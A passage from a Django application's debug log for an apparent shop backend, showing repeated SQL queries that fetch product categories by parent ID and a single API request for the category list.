"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:46,938 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:46,942 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:46,944 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:46,946 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:46,948 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:46,951 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:46,954 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:46,956 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:46,958 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:46,961 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:46,963 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:46,965 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:46,969 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:46,971 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:46,973 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:46,975 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:46,977 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:46,981 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:46,983 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:46,985 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:46,987 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:46,989 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:46,993 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:46,995 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:46,997 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:46,999 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:47,002 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:47,004 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:47,007 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:47,009 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:47,011 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:47,014 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:47,016 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:37:53,298 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:53,306 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:53,310 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:53,312 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:53,316 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:53,318 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:53,320 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:53,323 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:53,325 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:53,329 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:53,331 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:53,334 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:53,336 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:53,339 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:53,343 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:53,345 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:53,348 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:53,350 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:53,352 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:53,357 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:53,359 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:53,361 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:53,364 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:53,366 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:53,368 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:53,372 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:53,374 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:53,376 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:53,378 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:53,381 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:53,384 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:53,386 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:53,388 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:53,391 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER 